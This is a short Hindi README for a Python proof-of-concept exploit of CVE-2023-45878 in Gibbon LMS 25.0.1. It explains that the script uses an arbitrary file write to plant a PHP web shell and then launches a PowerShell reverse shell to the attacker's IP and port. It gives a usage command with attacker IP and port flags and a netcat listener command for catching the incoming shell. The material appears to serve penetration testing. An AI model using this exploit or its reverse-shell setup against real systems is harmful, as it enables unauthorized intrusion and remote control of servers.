
CVE-2023-45878 के लिए Python शोषण, जो Gibbon LMS 25.0.1 को लक्षित करता है। मनमाना फ़ाइल लेखन का उपयोग करके PHP वेब शेल अपलोड करता है और रिमोट एक्सेस के लिए PowerShell रिवर्स शेल निष्पादित करता है।
यह स्क्रिप्ट https://herolab.usd.de/security-advisories/usd-2023-0025/ के कार्य पर आधारित है। यह एक्सप्लॉइट Gibbon LMS 25.0.1 में Arbitrary File Write एक्सप्लॉइट का उपयोग करके काम करता है। यह PoC एक सरल php cmd स्क्रिप्ट अपलोड करेगा, और फिर उसका उपयोग करके एक powershell revshell लोड करेगा।
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
फ़्लैग्स:
-u, URL जहाँ Gibbon LMS स्थापित है।
-l, आपका IP
-p, आपका खुला पोर्ट
-f, फ़ाइल का नाम। महत्वपूर्ण है यदि आपको मैन्युअल रूप से परीक्षण करने की आवश्यकता हो। डिफ़ॉल्ट "asdf" है।
इनकमिंग शेल के लिए एक लिसनर तैयार रखें।
nc -lvnp 8888